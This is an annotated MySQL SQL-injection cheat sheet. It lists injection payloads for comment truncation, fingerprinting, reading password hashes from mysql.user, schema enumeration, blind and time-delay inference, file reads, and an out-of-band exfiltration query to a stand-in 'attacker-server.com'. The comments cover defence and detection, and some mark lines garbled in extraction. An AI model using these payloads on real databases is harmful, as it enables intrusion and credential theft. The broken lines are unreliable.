MYSQL

Comments

-- MySQL comment forms. In an injected value they make the server ignore the
-- rest of the original statement.
--   #      : comment to end of line.
--   /* */  : inline block comment.
--   -- -   : MySQL only treats "--" as a comment when it is followed by
--            whitespace; the trailing "-" keeps that space from being trimmed.
--   ;%00   : statement terminator followed by a URL-encoded NUL byte; whether
--            anything is truncated depends on the layer handling the string.
-- Defence: bind user input as parameters so it is never parsed as SQL syntax.
#
/* */
-- -
;%00

Version

-- Three equivalent ways to read the server version string: the VERSION()
-- function, and the `version` system variable in session and global scope.
-- Detection: these expressions arriving inside request parameters are a
-- common fingerprinting signature worth alerting on in WAF and query logs.
SELECT VERSION();
SELECT @@VERSION;
SELECT @@GLOBAL.VERSION;

User details

-- Account identity functions (expressions, to be used inside a SELECT).
-- USER(), SYSTEM_USER() and SESSION_USER() are synonyms and return the
-- user@host the client supplied; CURRENT_USER() returns the account the
-- server actually authenticated the session as.
user()
current_user()
system_user()
session_user()
-- Reads account names and password hashes from the grant table. This needs
-- SELECT on mysql.user, which an application account should never hold.
-- MySQL 5.7 and later keep the hash in `authentication_string`; the
-- `password` column no longer exists there, so this fails on those versions.
SELECT user,password FROM mysql.user;

Database details

-- NOTE(review): DB_NAME() is a SQL Server function, not a MySQL built-in; on
-- stock MySQL this statement errors unless a stored function of that name exists.
SELECT db_name();
-- Returns the session's default schema, or NULL when none is selected.
SELECT database();
-- Lists schema names; information_schema only shows objects the current
-- account has some privilege on, so least-privilege accounts see less.
SELECT schema_name FROM information_schema.schemata;

Database credentials

-- Same grant-table read as the query under "User details", with the host
-- column added. Requires SELECT on mysql.user; revoke it from application
-- accounts. On MySQL 5.7 and later the hash column is `authentication_string`,
-- not `password`.
SELECT host, user, password FROM mysql.user;

Server details

-- Reads the `hostname` system variable: the server host's name as seen by mysqld.
SELECT @@hostname;

Table Name

-- Lists table names from every schema visible to the current account (no
-- table_schema filter), system schemas included. Visibility follows the
-- account's privileges, so narrow grants directly limit what this returns.
SELECT table_name FROM information_schema.tables;

Column Names

-- 'tablename' is a placeholder. With no table_schema predicate the result
-- mixes columns from same-named tables in different schemas.
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';

No Quotes

-- Builds the string 'abc' from character codes 97, 98 and 99 without any
-- quote character. It shows why stripping or escaping quotes is not a
-- sufficient defence; parameterised queries are.
CONCAT(CHAR(97), CHAR(98), CHAR(99))

String Concatenation

-- foo and bar are placeholders for columns or expressions.
-- In MySQL, CONCAT() returns NULL if any argument is NULL.
CONCAT(foo, bar)

Conditionals

-- IF(condition, then, else) is MySQL-specific; this example returns 'true'.
-- Conditionals like this underlie boolean-based blind inference, so a request
-- parameter containing IF( or CASE WHEN is a useful detection signal.
SELECT IF(1=1,'true','false');

Time-delay

-- Pauses the statement for 10 seconds (expression, used inside a query).
-- Detection: shows up in the slow query log and as a response-latency
-- anomaly. Each call also holds a connection for the full duration.
Sleep(10)

Read Files

-- NOTE(review): the path separators appear to have been lost from this path
-- when the page was extracted.
-- LOAD_FILE() returns NULL unless the account has the FILE privilege, the
-- file is readable by the server process and smaller than max_allowed_packet,
-- and, when secure_file_priv is set to a directory, the file is inside it.
-- Hardening: revoke FILE from application accounts and set secure_file_priv.
SELECT LOAD_FILE('C:Windowswin.ini');

Out-of-Band Retrieval

-- NOTE(review): backslashes were lost from this line in extraction; as shown,
-- the final string literal is left unterminated and the statement does not parse.
-- Technique: passing LOAD_FILE() a UNC path makes a Windows-hosted server
-- resolve and contact a remote host, which leaks the embedded subquery result
-- through the lookup.
-- Mitigation: revoke the FILE privilege, set secure_file_priv, and block
-- outbound SMB and unrestricted DNS from database hosts. Alert on database
-- servers initiating outbound connections.
SELECT LOAD_FILE(concat("\\",(SELECT 1), "attacker-server.com\");

Substrings

-- SUBSTR() is a synonym for SUBSTRING(); positions are 1-based, so this
-- returns 'F' (one character starting at position 1).
SELECT substr('Foobar', 1, 1);

Retrieve Nth Line

-- `table` is a placeholder; it is a reserved word and would need backtick
-- quoting if used literally.
-- LIMIT 3,1 means offset 3, row count 1. The offset is zero-based, so this
-- returns the 4th row in ID order.
SELECT * FROM table ORDER BY ID LIMIT 3,1